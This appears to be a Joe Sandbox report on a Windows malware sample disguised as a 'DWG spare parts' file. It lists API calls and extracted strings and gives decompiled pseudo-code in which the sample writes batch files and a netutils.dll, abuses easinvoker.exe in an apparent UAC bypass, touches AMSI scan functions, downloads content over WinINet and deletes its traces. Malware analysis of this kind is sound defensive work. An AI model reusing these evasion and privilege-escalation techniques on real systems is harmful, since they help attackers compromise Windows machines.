                                                                0x0252a7b3
                                                                0x00000000
                                                                0x02527e3b
                                                                0x02527e3b
                                                                0x02527e41
                                                                0x02527e46
                                                                0x02527e56
                                                                0x02527e6e
                                                                0x02527e79
                                                                0x02527e7e
                                                                0x02527e80
                                                                0x00000000
                                                                0x02527e86
                                                                0x02527e91
                                                                0x02527e9c
                                                                0x02527ea1
                                                                0x02527ea3
                                                                0x02528535
                                                                0x0252853a
                                                                0x02528540
                                                                0x02528550
                                                                0x02528568
                                                                0x02528573
                                                                0x0252857a
                                                                0x02528585
                                                                0x0252859d
                                                                0x025285a8
                                                                0x025285a9
                                                                0x025285ae
                                                                0x025285b3
                                                                0x025285b9
                                                                0x025285c9
                                                                0x025285e1
                                                                0x025285ec
                                                                0x025285f3
                                                                0x025285fe
                                                                0x02528616
                                                                0x02528621
                                                                0x02528622
                                                                0x02528627
                                                                0x0252862c
                                                                0x02528632
                                                                0x02528642
                                                                0x0252865a
                                                                0x02528665
                                                                0x0252866c
                                                                0x02528677
                                                                0x0252868f
                                                                0x0252869a
                                                                0x0252869b
                                                                0x025286ac
                                                                0x025286bc
                                                                0x025286c4
                                                                0x025286d0
                                                                0x025286db
                                                                0x025286e2
                                                                0x02528700
                                                                0x02528718
                                                                0x02528723
                                                                0x0252872a
                                                                0x0252872d
                                                                0x0252872f
                                                                0x02528732
                                                                0x02528735
                                                                0x0252873a
                                                                0x02528744
                                                                0x02527ea9
                                                                0x02527ea9
                                                                0x02527eae
                                                                0x02527eb4
                                                                0x02527ec4
                                                                0x02527edc
                                                                0x02527ee7
                                                                0x02527eee
                                                                0x02527ef9
                                                                0x02527f11
                                                                0x02527f1c
                                                                0x02527f1d
                                                                0x02527f22
                                                                0x02527f27
                                                                0x02527f2d
                                                                0x02527f3d
                                                                0x02527f55
                                                                0x02527f60
                                                                0x02527f67
                                                                0x02527f72
                                                                0x02527f8a
                                                                0x02527f95
                                                                0x02527f96
                                                                0x02527f9b
                                                                0x02527fa0
                                                                0x02527fa6
                                                                0x02527fb6
                                                                0x02527fce
                                                                0x02527fd9
                                                                0x02527fe0
                                                                0x02527feb
                                                                0x02528003
                                                                0x0252800e
                                                                0x0252800f
                                                                0x02528014
                                                                0x0252801a
                                                                0x0252801f
                                                                0x0252802f
                                                                0x02528046
                                                                0x0252804b
                                                                0x02528051
                                                                0x02528056
                                                                0x0252805c
                                                                0x0252806c
                                                                0x02528083
                                                                0x02528088
                                                                0x0252808e
                                                                0x02528093
                                                                0x02528099
                                                                0x025280a9
                                                                0x025280c0
                                                                0x025280c5
                                                                0x025280ca
                                                                0x025280d0
                                                                0x025280e0
                                                                0x025280f8
                                                                0x02528103
                                                                0x0252810a
                                                                0x02528115
                                                                0x0252812d
                                                                0x02528138
                                                                0x02528139
                                                                0x0252814e
                                                                0x0252815e
                                                                0x02528163
                                                                0x02528169
                                                                0x0252816e
                                                                0x02528183
                                                                0x02528193
                                                                0x02528198
                                                                0x0252819e
                                                                0x025281a3
                                                                0x025281c3
                                                                0x025281ce
                                                                0x025281d4
                                                                0x025281e5
                                                                0x025281f5
                                                                0x025281fd
                                                                0x02528209
                                                                0x02528214
                                                                0x0252821b
                                                                0x02528239
                                                                0x02528251
                                                                0x0252825c
                                                                0x02528263
                                                                0x02528266
                                                                0x02528268
                                                                0x0252826b
                                                                0x0252826e
                                                                0x02528273
                                                                0x0252827d
                                                                0x0252827d
                                                                0x02527ea3
                                                                0x02527e80
                                                                0x02527612
                                                                0x02527612
                                                                0x02527618
                                                                0x02527623
                                                                0x02527628
                                                                0x0252762d
                                                                0x02527633
                                                                0x02527643
                                                                0x0252765b
                                                                0x0252766d
                                                                0x00000000
                                                                0x02527673
                                                                0x02527673
                                                                0x02527678
                                                                0x0252767e
                                                                0x0252768e
                                                                0x025276a6
                                                                0x025276b1
                                                                0x025276b8
                                                                0x025276c3
                                                                0x025276db
                                                                0x025276e6
                                                                0x025276e7
                                                                0x025276ec
                                                                0x025276f1
                                                                0x025276f7
                                                                0x02527707
                                                                0x0252771f
                                                                0x0252772a
                                                                0x02527731
                                                                0x0252773c
                                                                0x02527754
                                                                0x0252775f
                                                                0x02527760
                                                                0x02527765
                                                                0x0252776b
                                                                0x02527770
                                                                0x02527781
                                                                0x02527798
                                                                0x0252779d
                                                                0x025277ab
                                                                0x025277ad
                                                                0x025277bf
                                                                0x025277ca
                                                                0x025277cf
                                                                0x025277cf
                                                                0x025277d4
                                                                0x025277da
                                                                0x025277df
                                                                0x025277e5
                                                                0x025277f5
                                                                0x0252780c
                                                                0x02527811
                                                                0x02527816
                                                                0x0252781c
                                                                0x0252782c
                                                                0x02527844
                                                                0x0252784f
                                                                0x02527856
                                                                0x02527861
                                                                0x02527879
                                                                0x02527884
                                                                0x02527885
                                                                0x0252788a
                                                                0x0252788f
                                                                0x02527895
                                                                0x025278a5
                                                                0x025278bd
                                                                0x025278c8
                                                                0x025278cf
                                                                0x025278da
                                                                0x025278f2
                                                                0x025278fd
                                                                0x025278fe
                                                                0x02527905
                                                                0x0252790a
                                                                0x02527918
                                                                0x02527929
                                                                0x02527939
                                                                0x02527944
                                                                0x02527950
                                                                0x0252795b
                                                                0x0252795c
                                                                0x0252796c
                                                                0x02527977
                                                                0x02527983
                                                                0x0252798e
                                                                0x0252798f
                                                                0x0252799f
                                                                0x025279aa
                                                                0x025279b6
                                                                0x025279c1
                                                                0x025279c2
                                                                0x025279d8
                                                                0x025279dd
                                                                0x025279ed
                                                                0x025279f2
                                                                0x025279f7
                                                                0x025279fd
                                                                0x02527a0d
                                                                0x02527a25
                                                                0x02527a30
                                                                0x02527a37
                                                                0x02527a42
                                                                0x02527a5a
                                                                0x02527a65
                                                                0x02527a66
                                                                0x02527a77
                                                                0x02527a87
                                                                0x02527a8f
                                                                0x02527a96
                                                                0x02527ab4
                                                                0x02527abf
                                                                0x02527ac6
                                                                0x02527ace
                                                                0x02527adc
                                                                0x02527af2
                                                                0x02527afd
                                                                0x02527b04
                                                                0x02527b0c
                                                                0x02527b18
                                                                0x02527b2e
                                                                0x02527b39
                                                                0x02527b40
                                                                0x02527b54
                                                                0x02527b59
                                                                0x02527b74
                                                                0x02527b8c
                                                                0x02527b97
                                                                0x02527b9e
                                                                0x02527ba3
                                                                0x02527ba6
                                                                0x02527ba9
                                                                0x02527bae
                                                                0x02527bb8
                                                                0x02527bb8
                                                                0x0252766d
                                                                0x0252760c
                                                                0x025271dc

                                                                APIs
                                                                  • Part of subcall function 025236CC: GetModuleHandleA.KERNEL32(00000000,00000000,02523792), ref: 02523725
                                                                  • Part of subcall function 025236CC: GetProcAddress.KERNEL32(77CD0000,00000000), ref: 02523748
                                                                  • Part of subcall function 025236CC: FreeLibrary.KERNEL32(77CD0000,00000000,00000000,02523792), ref: 02523772
                                                                  • Part of subcall function 02512FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000), ref: 02512FE8
                                                                  • Part of subcall function 02512FC4: GetCommandLineA.KERNEL32(?,?,?,025269CD,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 02512FFA
                                                                  • Part of subcall function 025134CC: GetFileSize.KERNEL32(0001D7B0,00000000,?,?,02526CF6,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025134E8
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C), ref: 02526DF0
                                                                  • Part of subcall function 0252521C: InternetOpenA.WININET(lVali,00000004,00000000,00000000,00000000), ref: 0252522C
                                                                  • Part of subcall function 0252521C: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000200,00000000), ref: 0252524F
                                                                  • Part of subcall function 0252521C: InternetCloseHandle.WININET(00CC0004), ref: 025252E1
                                                                • Sleep.KERNEL32(000001F4,ScanBuffer,0252AD5C,OpenSession,0252AD5C,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C), ref: 02526F3D
                                                                  • Part of subcall function 02525974: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 025259B8
                                                                  • Part of subcall function 02525974: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,04000000,00000000), ref: 025259F6
                                                                  • Part of subcall function 02525974: InternetReadFile.WININET(00CC000C,0256D4D4,00000401,0256D8D8), ref: 02525A2C
                                                                  • Part of subcall function 02525974: InternetCloseHandle.WININET(00CC000C), ref: 02525A6F
                                                                  • Part of subcall function 02518134: GetFileAttributesA.KERNEL32(00000000,?,0252752B,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession), ref: 0251813F
                                                                  • Part of subcall function 025182C8: CreateDirectoryA.KERNEL32(00000000,00000000,?,02527551,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,ScanString,0252AD5C,ScanBuffer,0252AD5C,ScanString,0252AD5C), ref: 025182D5
                                                                  • Part of subcall function 02518110: GetFileAttributesA.KERNEL32(00000000,?,02526AA4,ScanBuffer,0252AD5C,0256D8E0,ScanBuffer,0252AD5C,ScanString,0252AD5C,OpenSession,0252AD5C,Initialize,0252AD5C,00000000,0252A8DA), ref: 0251811B
                                                                • CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 02527929
                                                                  • Part of subcall function 02525698: _lcreat.KERNEL32(00000000,00000000), ref: 025256CF
                                                                  • Part of subcall function 02525698: _lwrite.KERNEL32(00000000,00000000,?,00000000,02525715), ref: 025256EF
                                                                  • Part of subcall function 02525698: _lclose.KERNEL32(00000000), ref: 025256F5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.258561577.0000000002511000.00000020.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                • Associated: 00000000.00000002.258558187.0000000002510000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                • Associated: 00000000.00000002.258580914.000000000252D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2510000_DWG spare parts 455RTMGF Model.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$File$Open$Handle$AttributesCloseModuleSleep$AddressCommandCopyCreateDirectoryFreeLibraryLineNameProcReadSize_lclose_lcreat_lwrite
                                                                • String ID: @echo offset mypath=%cd%if "%~1" equ "" (set saka=%mypath%\Cdex.bat) ELSE set "saka=%~1"net session >nul 2>&1 || goto :label%saka% exit /b 2:label::REQUIREMENTSwhoami /groups|findstr /i "\<S-1-5-32-544\>" >nul 2>&1if ERRORLEVEL 1 exit /b 1::Wi$ & exit$.exe$.url$217$5E5CDDEE$AccessCheckByType$BuildImpersonateTrusteeW$BuildSecurityDescriptorA$BuildSecurityDescriptorW$C:\Users\Public\Libraries$C:\Windows\SysWOW64$Cdex.bat$CopyFileA$CryptSIPCreateIndirectData$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DllGetClassObject$DT$ElfOpenEventLogA$ElfOpenEventLogW$ElfReadEventLogA$ElfReadEventLogW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$GetEventLogInformation$HotKey=$IconIndex=$Initialize$InternetOpenUrlA$InternetOpenW$InternetReadFile$NotifyChangeEventLog$NtCreateFile$NtOpenFile$Null$O.bat$OpenEventLogA$OpenEventLogW$OpenSession$ReadEventLogA$ReadEventLogW$ReportEventA$ReportEventW$SaferRecordEventLogEntry$SaferSetLevelInformation$SaferSetPolicyInformation$ScanBuffer$ScanString$SetFileSecurityA$SetFileSecurityW$SetKernelObjectSecurity$SetPrivateObjectSecurityEx$SetSecurityAccessMask$SetSecurityInfo$SetSecurityInfoExA$SetSecurityInfoExW$SetTraceCallback$ShellExecuteExA$SoftpubCheckCert$SoftpubDefCertInit$SoftpubInitialize$SuspendThread$SystemFunction035$TraceEvent$TraceEventInstance$TraceMessage$TraceMessageVa$TraceQueryInformation$TraceSetInformation$URL=file:"$UacInitialize$UacScan$WmiNotificationRegistrationW$WmiOpenBlock$WmiQueryAllDataA$WmiQuerySingleInstanceW$WmiReceiveNotificationsA$WmiReceiveNotificationsW$Ymo_^$[InternetShortcut]$^^Nc$advapi32$iexpress$iexpress.exe$kernel32$mssip32$ntdll$shell32$softpub$start /min $t.bat$wininet$wuapi
                                                                • API String ID: 1450581692-2335470602
                                                                • Opcode ID: 7480d79896530bc2fc1a669c062ef11e53fdfc37427f6c8d0d39b00f8c6e0273
                                                                • Instruction ID: 7ab1e13891585dd01a46f2beb726d4c99d88bdb66d02664ec80f61871ef3950f
                                                                • Opcode Fuzzy Hash: 7480d79896530bc2fc1a669c062ef11e53fdfc37427f6c8d0d39b00f8c6e0273
                                                                • Instruction Fuzzy Hash: 5A730075B0112A9BEB11EB64D880ADE73B7FFC5300F5198E59408A7290DE34AE89DF5C
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0252874D Relevance: 133.0, APIs: 11, Strings: 64, Instructions: 1754filesleepprocessCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1983 252874d-252899f call 2514c24 call 2514d64 call 2514a98 call 2525540 call 25148f4 call 2525698 call 2514c24 call 2514d64 call 2514a98 call 2525540 call 25148f4 call 2525698 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2525540 call 25148f4 call 2525698 call 2514c24 call 2514d64 call 2514a98 call 2525540 call 25148f4 call 2525698 call 2514d64 call 2514a98 call 2518110 2052 25289a5-2528ba7 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514d64 call 25137ac call 2525724 Sleep call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA call 2514d64 call 2514a98 call 2514d64 DeleteFileA 1983->2052 2053 2528baa-2529004 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2525580 call 25148f4 call 2517da0 call 2525b34 call 25148f4 call 2525ac0 call 2525910 call 25148f4 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 1983->2053 2052->2053 2240 252900a-2529019 call 2514cb0 2053->2240 2241 252934e-25293d6 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 2053->2241 2240->2241 2246 252901f-252902e call 2514cb0 2240->2246 2275 2529841-25298c9 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514cb0 2241->2275 2276 25293dc-25293eb call 2514cb0 2241->2276 2246->2241 2252 2529034-2529349 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514dbc call 2524f34 2246->2252 2252->2241 2326 2529a11-252a7b3 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc call 2514a98 * 2 call 25236cc ExitProcess 2275->2326 2327 25298cf-25298de call 2514cb0 2275->2327 2276->2275 2285 25293f1-2529400 call 2514cb0 2276->2285 2285->2275 2294 2529406-252983c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc WinExec call 25245f8 OpenProcess NtSuspendProcess call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514dbc call 2523f94 call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514a98 * 2 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc 2285->2294 2294->2275 2327->2326 2338 25298e4-25298f3 call 2514cb0 2327->2338 2338->2326 2351 25298f9-2529a0c call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2514c24 call 2514d64 call 2514a98 call 2514bb0 call 2514d64 call 2514a98 call 25236cc call 2512fc4 call 2514dbc call 25248a4 2338->2351 2351->2326
                                                                C-Code - Quality: 52%
                                                                			E0252874D(void* __eax, intOrPtr __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t577;
				intOrPtr _t588;
				intOrPtr _t613;
				intOrPtr _t624;
				intOrPtr _t626;
				void* _t631;
				intOrPtr _t674;
				intOrPtr _t678;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t684;
				intOrPtr _t760;
				intOrPtr _t776;
				intOrPtr _t792;
				intOrPtr _t1286;
				intOrPtr _t1288;
				void* _t1322;
				void* _t1323;
				intOrPtr _t1325;
				intOrPtr _t1327;
				long _t1360;
				intOrPtr _t1362;
				void* _t1378;
				intOrPtr _t1379;
				intOrPtr _t1458;
				intOrPtr _t1460;
				intOrPtr _t1570;
				intOrPtr _t1576;
				intOrPtr _t1584;
				intOrPtr _t1592;
				intOrPtr _t1600;
				intOrPtr _t1608;
				intOrPtr _t1616;
				int _t1623;
				char _t1624;
				intOrPtr _t1633;
				intOrPtr _t1636;
				intOrPtr _t1637;
				intOrPtr _t1638;
				intOrPtr _t1641;
				intOrPtr _t1642;
				intOrPtr _t1643;
				intOrPtr _t1644;
				intOrPtr _t1645;
				intOrPtr _t1646;
				intOrPtr _t1647;
				intOrPtr _t1648;
				intOrPtr _t1649;
				intOrPtr _t1650;
				intOrPtr _t1651;
				intOrPtr _t1652;
				intOrPtr _t1653;
				intOrPtr _t1654;
				intOrPtr _t1655;
				intOrPtr _t1658;
				intOrPtr _t1659;
				intOrPtr _t1660;
				intOrPtr _t1661;
				intOrPtr _t1662;
				intOrPtr _t1663;
				intOrPtr _t1664;
				intOrPtr _t1665;
				intOrPtr _t1666;
				intOrPtr _t1667;
				intOrPtr _t1668;
				intOrPtr _t1669;
				intOrPtr _t1670;
				intOrPtr _t1671;
				intOrPtr _t1672;
				intOrPtr _t1678;
				intOrPtr _t1683;
				void* _t1688;
				intOrPtr _t1693;
				intOrPtr _t1698;
				void* _t1704;
				void* _t1709;
				void* _t1714;
				intOrPtr _t1715;
				void* _t1726;
				void* _t1731;
				void* _t1736;
				void* _t1741;
				void* _t1746;
				void* _t1752;
				void* _t1758;
				void* _t1764;
				void* _t1767;
				void* _t1772;
				void* _t1775;
				void* _t1780;
				void* _t1783;
				void* _t1788;
				void* _t1791;
				void* _t1794;
				void* _t1799;
				void* _t1804;
				void* _t1807;
				void* _t1810;
				void* _t1813;
				void* _t1816;
				void* _t1819;
				void* _t1822;
				void* _t1825;
				void* _t1828;
				void* _t1831;
				void* _t1834;
				void* _t1837;
				void* _t1840;
				void* _t1843;
				void* _t1846;
				void* _t1849;
				void* _t1852;
				void* _t1855;
				void* _t1858;
				void* _t1861;
				void* _t1864;
				void* _t1867;
				void* _t1870;
				void* _t1873;
				void* _t1876;
				void* _t1879;
				void* _t1882;
				void* _t1885;
				void* _t1888;
				void* _t1891;
				void* _t1894;
				void* _t1897;
				void* _t1900;
				void* _t1903;
				void* _t1906;
				void* _t1909;
				void* _t1912;
				void* _t1915;
				void* _t1918;
				void* _t1921;
				void* _t1924;
				void* _t1929;
				void* _t1934;
				void* _t1937;
				void* _t1940;
				void* _t1943;
				void* _t1946;
				intOrPtr _t1947;
				intOrPtr _t1955;
				intOrPtr _t1957;
				intOrPtr _t1959;
				void* _t1969;
				void* _t1974;
				void* _t1983;
				void* _t1988;
				void* _t1993;
				void* _t1999;
				void* _t2002;
				void* _t2007;
				void* _t2010;
				void* _t2015;
				void* _t2018;
				void* _t2023;
				void* _t2030;
				void* _t2035;
				void* _t2040;
				void* _t2043;
				void* _t2048;
				void* _t2051;
				void* _t2056;
				void* _t2059;
				void* _t2064;
				void* _t2075;
				char _t2084;

				_t2087 = __fp0;
				_t2074 = __esi;
				_t2073 = __edi;
				_t1625 = __ebx;
				_push(0x252ae60);
				_push("easinvoker.exe");
				E02514C24();
				E02514A98(0x256d8e4, E02514D64( *((intOrPtr*)(_t2075 - 0x648))));
				E02525540(0x252e4f0, _t2075 - 0x64c, 0x2023f);
				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x64c)));
				_t1678 =  *0x256d8e4; // 0x0
				_t577 =  *0x256dccc; // 0x0
				E02525698(_t577, __ebx, _t1678, __esi);
				_push( *0x256da90);
				_push(0x252ae60);
				_push( *0x256dcf8);
				_push("O.bat");
				E02514C24();
				E02514A98(0x256d8ec, E02514D64( *((intOrPtr*)(_t2075 - 0x650))));
				E02525540(0x254e730, _t2075 - 0x654, 0x19a);
				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x654)));
				_t1683 =  *0x256d8ec; // 0x0
				_t588 =  *0x256dccc; // 0x0
				E02525698(_t588, __ebx, _t1683, __esi);
				_push(0x252ad5c);
				_push( *0x256dcd8);
				_push("ScanString");
				E02514C24();
				E02514A98(_t2075 - 0x658, E02514D64( *((intOrPtr*)(_t2075 - 0x65c))));
				_push( *((intOrPtr*)(_t2075 - 0x658)));
				_t1633 =  *0x256dcd8; // 0x2a51b38
				E02514BB0(_t2075 - 0x664, _t1633, 0x252ad5c);
				E02514A98(_t2075 - 0x660, E02514D64( *((intOrPtr*)(_t2075 - 0x664))));
				_pop(_t1688);
				E025236CC( *((intOrPtr*)(_t2075 - 0x660)), _t1625, _t1688, _t2074);
				_push( *0x256da90);
				_push(0x252ae60);
				_push("netutils.dll");
				E02514C24();
				E02514A98(0x256d8e8, E02514D64( *((intOrPtr*)(_t2075 - 0x668))));
				E02525540(0x254e8cc, _t2075 - 0x66c, 0x1b32c);
				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x66c)));
				_t1693 =  *0x256d8e8; // 0x0
				_t613 =  *0x256dccc; // 0x0
				E02525698(_t613, _t1625, _t1693, _t2074);
				_push( *0x256da90);
				_push(0x252ae60);
				_push("KDECO.bat");
				E02514C24();
				E02514A98(0x256dcd4, E02514D64( *((intOrPtr*)(_t2075 - 0x670))));
				E02525540(0x252e004, _t2075 - 0x674, 0x9a);
				E025148F4(0x256dccc,  *((intOrPtr*)(_t2075 - 0x674)));
				_t1698 =  *0x256dcd4; // 0x0
				_t624 =  *0x256dccc; // 0x0
				E02525698(_t624, _t1625, _t1698, _t2074);
				_t626 =  *0x256d8ec; // 0x0
				E02514A98(_t2075 - 0x678, E02514D64(_t626));
				_t631 = E02518110( *((intOrPtr*)(_t2075 - 0x678)));
				_t2077 = _t631;
				if(_t631 != 0) {
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanBuffer");
					E02514C24();
					E02514A98(_t2075 - 0x67c, E02514D64( *((intOrPtr*)(_t2075 - 0x680))));
					_push( *((intOrPtr*)(_t2075 - 0x67c)));
					_t1672 =  *0x256dcd8; // 0x2a51b38
					E02514BB0(_t2075 - 0x688, _t1672, 0x252ad5c);
					E02514A98(_t2075 - 0x684, E02514D64( *((intOrPtr*)(_t2075 - 0x688))));
					_pop(_t2064);
					E025236CC( *((intOrPtr*)(_t2075 - 0x684)), _t1625, _t2064, _t2074);
					_t1570 =  *0x256d8ec; // 0x0
					E02514D64(_t1570);
					E025137AC();
					E02525724(_t2075 - 0x5f0, _t1625, 0, 0x252afa8, __edi, _t2074, _t2077, __fp0);
					Sleep(0x1388);
					_t1576 =  *0x256d8e4; // 0x0
					E02514A98(_t2075 - 0x68c, E02514D64(_t1576));
					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x68c));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
					asm("sbb eax, eax");
					_t1584 =  *0x256da54; // 0x0
					E02514A98(_t2075 - 0x690, E02514D64(_t1584));
					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x690));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
					asm("sbb eax, eax");
					_t1592 =  *0x256da58; // 0x0
					E02514A98(_t2075 - 0x694, E02514D64(_t1592));
					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x694));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
					asm("sbb eax, eax");
					_t1600 =  *0x256dcd4; // 0x0
					E02514A98(_t2075 - 0x698, E02514D64(_t1600));
					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x698));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
					asm("sbb eax, eax");
					_t1608 =  *0x256d8ec; // 0x0
					E02514A98(_t2075 - 0x69c, E02514D64(_t1608));
					_t1625 =  *((intOrPtr*)(_t2075 - 0x69c));
					 *((intOrPtr*)(_t2075 - 0x230)) =  *((intOrPtr*)(_t2075 - 0x69c));
					DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 0x230))));
					asm("sbb eax, eax");
					_t1616 =  *0x256d8e8; // 0x0
					E02514A98(_t2075 - 0x6a0, E02514D64(_t1616));
					 *((intOrPtr*)(_t2075 - 4)) =  *((intOrPtr*)(_t2075 - 0x6a0));
					_t1623 = DeleteFileA(E02514D64( *((intOrPtr*)(_t2075 - 4))));
